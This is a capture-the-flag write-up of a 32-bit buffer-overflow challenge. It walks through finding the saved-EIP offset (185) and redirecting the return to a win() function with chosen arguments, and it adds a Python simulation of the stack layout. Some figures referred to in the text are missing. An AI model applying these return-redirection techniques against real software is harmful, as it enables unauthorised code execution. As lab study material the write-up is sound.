Function activation record and binary exploitation (HTB You know 0xDiablos writeup)
A function’s activation record instance is generally of the following form:

We can see how this fact can be of use while exploiting our binary.
Disassembling our binary in Ghidra, we can see the following code in main:
Disassembling vuln:
Listing all functions, we notice a function named win():
Clearly the function needs to be called with parameter1 = 0xdeadbeef and parameter2 = 0xc0ded00d to get the flag.
We notice that the address of this win function is 0x080491e2.

So to exploit this, we first find the offset at which the instruction pointer is stored on the stack.
At first we see a segfault, but no overwriting of eip.
Then, at offset 185, we see an overwriting of eip.
We then treat this overwriting of the instruction pointer as a function call: we insert a dummy return address, and then parameter1 and parameter2 (the reverse of what we see in the activation record instance).
Sure enough, this gets us our flag.
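The following model is an added example, not code from the original writeup: it simulates what win() reads from the stack after the overwritten return, and shows why the dummy return address must sit between the win address and the parameters. The win address and parameter values are the ones given above; DUMMY_RET, MODEL_OFFSET and the helper names are assumptions made for this model, and MODEL_OFFSET is not the offset measured against the binary.

```python
import struct

WIN_ADDR = 0x080491E2                    # address of win() given in the writeup
PARAM1, PARAM2 = 0xDEADBEEF, 0xC0DED00D  # values win() checks, per the writeup
DUMMY_RET = 0x41414141                   # placeholder return address (constructed)
MODEL_OFFSET = 16                        # constructed filler length, for this model only

def build_stack(words, offset=MODEL_OFFSET):
    """Filler up to the saved-EIP slot, then 32-bit little-endian words.
    Eight zero bytes stand in for whatever already lies above on the stack."""
    return b"A" * offset + struct.pack("<%dI" % len(words), *words) + bytes(8)

def callee_view(stack, offset=MODEL_OFFSET):
    """Model `ret` in the overflowed function followed by the callee's prologue."""
    esp = offset
    (eip,) = struct.unpack_from("<I", stack, esp)  # ret: pop eip
    esp += 4
    ebp = esp - 4                                  # push ebp; mov ebp, esp

    def word(off):
        return struct.unpack_from("<I", stack, ebp + off)[0]

    # cdecl, 32-bit: [ebp+4] return address, [ebp+8] first arg, [ebp+12] second arg
    return {"eip": eip, "return_address": word(4),
            "param1": word(8), "param2": word(12)}

def args_ok(view):
    """True when the callee would see the two values win() compares against."""
    return (view["param1"], view["param2"]) == (PARAM1, PARAM2)

# Layout from the text: win address, dummy return address, then the parameters.
with_dummy = callee_view(build_stack([WIN_ADDR, DUMMY_RET, PARAM1, PARAM2]))
# Same layout without the dummy return address: every slot shifts down by one.
without_dummy = callee_view(build_stack([WIN_ADDR, PARAM1, PARAM2]))

if __name__ == "__main__":
    for name, view in (("with dummy", with_dummy), ("without dummy", without_dummy)):
        print(name, {k: hex(v) for k, v in view.items()}, "args ok:", args_ok(view))
```

Without the dummy word, the callee takes parameter1 as its return address and parameter2 as its first argument, so the comparison in win() fails.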